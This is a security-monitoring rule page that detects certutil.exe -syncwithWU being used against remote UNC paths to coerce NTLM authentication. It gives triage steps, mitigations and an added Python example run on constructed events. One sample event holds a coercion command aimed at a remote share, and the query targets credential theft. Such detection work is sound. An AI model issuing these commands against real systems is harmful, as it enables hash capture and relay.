Potential NTLM Coercion Via Certutil.EXE

Last updated on:

Rule name: Potential NTLM Coercion Via Certutil.EXE
Rule type: Standard
Log sources: Windows
MITRE ATT&CK tags: Defense Evasion: System Binary Proxy Execution (T1218)
Severity: Critical

About the rule

Rule Type

Standard

Rule Description

Certutil.exe is a legitimate Windows utility often abused by attackers for lateral movement and credential access. In this technique, certutil is used to access a remote resource that triggers an automatic NTLM authentication attempt. This coerces the system to send NTLM credentials to the attacker-controlled server, potentially enabling credential relay or capture. Such behavior is uncommon in legitimate use cases and is a hallmark of red team operations or early-stage credential harvesting by sophisticated adversaries.

Severity

Trouble

Rule journey

Attack chain scenario

Initial access → Execution → LOLBins abuse → certutil.exe used to access remote UNC path → NTLM authentication attempt triggered → NTLM hash capture or relay → Credential compromise → Lateral movement or privilege escalation

Impact

  • Credential theft
  • Privilege escalation
  • Lateral movement
  • Defense evasion
  • Domain trust abuse

Rule Requirement

Prerequisites


Using Windows event viewer:
To enable detailed process tracking in a domain environment, log in to a domain controller using domain admin credentials and open the Group Policy Management Console (GPMC). Create or edit a GPO linked to the target OU and navigate to the Advanced Audit Policy Configuration section to enable success auditing for both process creation and termination. To capture command-line details, enable the Include command line in process creation events setting under Audit Process Creation. Additionally, create the Microsoft-Windows-Security-Auditing/Operational registry key in the specified EventLog path to support enhanced auditing.

Using Sysmon:
To enable detailed process monitoring using Sysmon, first download and install it from Microsoft Sysinternals. Run Command Prompt as an administrator and install Sysmon with a configuration file that includes process creation tracking using sysmon.exe -i [configfile.xml]. Ensure your configuration includes a <ProcessCreate> filter to capture all process creation events. Additionally, create the Microsoft-Windows-Sysmon/Operational registry key under the EventLog path if it doesn’t already exist.

Criteria

Action1: actionname = "Process started" AND (PROCESSNAME endswith "\certutil.exe" OR ORIGINALFILENAME = "CertUtil.exe") AND (COMMANDLINE contains " -syncwithWU " AND COMMANDLINE contains " \")
select Action1.HOSTNAME, Action1.MESSAGE, Action1.COMMANDLINE, Action1.FILE_NAME, Action1.PROCESSNAME, Action1.USERNAME, Action1.PARENTPROCESSNAME

Detection

Execution Mode

realtime

Log Sources

Windows

MITRE ATT&CK

Defense Evasion: System Binary Proxy Execution (T1218)

Security Standards

Enabling this rule will help you meet the requirements of the security standards listed below:

ID.RA-01: Vulnerabilities in assets are identified, validated, and recorded

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you're notified of certutil.exe being used in a way that may attempt to coerce NTLM authentication to a remote server—a known technique for capturing hashed credentials.

Author

Nasreddine Bencherchali (Nextron Systems)

Future actions

Known False Positives

This rule may be triggered by legitimate administrative tasks where certutil.exe accesses network shares using UNC paths for file transfers, updates, or diagnostics.

Next Steps

When this rule is triggered, the following measures can be implemented:

  • Identification: Review the certutil.exe command-line arguments to determine whether the remote server is internal or unknown and whether the access aligns with expected administrative behavior.
  • Analysis: Correlate the activity with known users, systems, and timeframes. Check for subsequent authentication attempts, lateral movement, or abnormal SMB traffic to suspicious IPs.
  • Response: Isolate the affected host, investigate the targeted remote system, and reset any potentially compromised credentials. Block outbound SMB (TCP 445) where not needed, and audit for other coercion attempts in recent logs.
  • Restrict use of NTLM: Disable NTLM where feasible or restrict its use via Group Policy.
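The following is an added example, not part of this rule page or the Sigma rule it is based on: it applies the Criteria above to a few constructed process-creation events and, for each match, performs the Identification step from Next Steps by extracting the UNC host from the command line and labelling it internal or unknown. It assumes the trailing criterion (COMMANDLINE contains " \") refers to the UNC path prefix "\\" named in the attack chain, and the trusted DNS suffix ".corp.local" is a constructed placeholder.

```python
import re
# Constructed process-creation events using the rule's field names (as a SIEM
# normalises Sysmon EID 1 / Security 4688); not real telemetry.
EVENTS = [
    {"actionname": "Process started", "HOSTNAME": "WS01", "USERNAME": "CORP\\jdoe",
     "PROCESSNAME": r"C:\Windows\System32\certutil.exe", "ORIGINALFILENAME": "CertUtil.exe",
     "PARENTPROCESSNAME": r"C:\Windows\System32\cmd.exe",
     "COMMANDLINE": r"certutil.exe -syncwithWU \\10.0.0.99\share"},
    {"actionname": "Process started", "HOSTNAME": "WS02", "USERNAME": "CORP\\admin",
     "PROCESSNAME": r"C:\Windows\System32\certutil.exe", "ORIGINALFILENAME": "CertUtil.exe",
     "PARENTPROCESSNAME": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "COMMANDLINE": r"certutil -syncwithWU \\wsus01.corp.local\updates"},
    {"actionname": "Process started", "HOSTNAME": "WS03", "USERNAME": "CORP\\jdoe",
     "PROCESSNAME": r"C:\Windows\System32\certutil.exe", "ORIGINALFILENAME": "CertUtil.exe",
     "PARENTPROCESSNAME": r"C:\Windows\System32\cmd.exe",
     "COMMANDLINE": r"certutil -syncwithWU C:\Temp\wu"},  # local path: no UNC, no alert
]

INTERNAL_SUFFIXES = (".corp.local",)  # assumed trusted DNS suffixes (constructed)
UNC_HOST = re.compile(r"\\\\([^\\\s]+)")  # host part of \\host\share
SELECT = ("HOSTNAME", "MESSAGE", "COMMANDLINE", "FILE_NAME", "PROCESSNAME",
          "USERNAME", "PARENTPROCESSNAME")

def matches_rule(ev: dict) -> bool:
    """The page's Criteria; string tests are case-insensitive like most SIEM backends."""
    proc = ev.get("PROCESSNAME", "").lower()
    orig = ev.get("ORIGINALFILENAME", "").lower()
    cmd = ev.get("COMMANDLINE", "").lower()
    return (ev.get("actionname") == "Process started"
            and (proc.endswith("\\certutil.exe") or orig == "certutil.exe")
            and " -syncwithwu " in cmd and " \\\\" in cmd)

def classify_target(cmd: str) -> tuple:
    """Identification step: extract the UNC host and label it internal or unknown."""
    m = UNC_HOST.search(cmd)
    if not m:
        return None, "none"
    host = m.group(1).lower()
    return host, "internal" if host.endswith(INTERNAL_SUFFIXES) else "unknown"

def run_rule(events: list) -> list:
    """One alert per matching event: the rule's selected fields plus a triage verdict."""
    alerts = []
    for ev in events:
        if matches_rule(ev):
            alert = {k: ev.get(k) for k in SELECT}
            alert["TARGET"], alert["VERDICT"] = classify_target(ev["COMMANDLINE"])
            alerts.append(alert)
    return alerts
```

Fields the rule selects but the sample events lack (MESSAGE, FILE_NAME) come back as None, which is what a real pipeline would see when a log source does not populate them.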

Mitigation

Mitigation ID and name, followed by the mitigation description:

M1042 Disable or Remove Feature or Program
Many native binaries may not be necessary within a given environment.

M1038 Execution Prevention
Use application control to prevent execution of binaries that are not required for a given system or network.

M1050 Exploit Protection
Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using trusted binaries to bypass application control.

M1037 Filter Network Traffic
Use network appliances to filter incoming or outgoing traffic and perform protocol-based filtering. Also configure software on endpoints to filter network traffic.

M1026 Privileged Account Management
Restrict the execution of vulnerable binaries to privileged accounts or groups that need to use them to lessen the opportunities for malicious usage.

M1021 Restrict Web-Based Content
Restrict use of certain websites, block downloads/attachments, block JavaScript, restrict browser extensions, etc.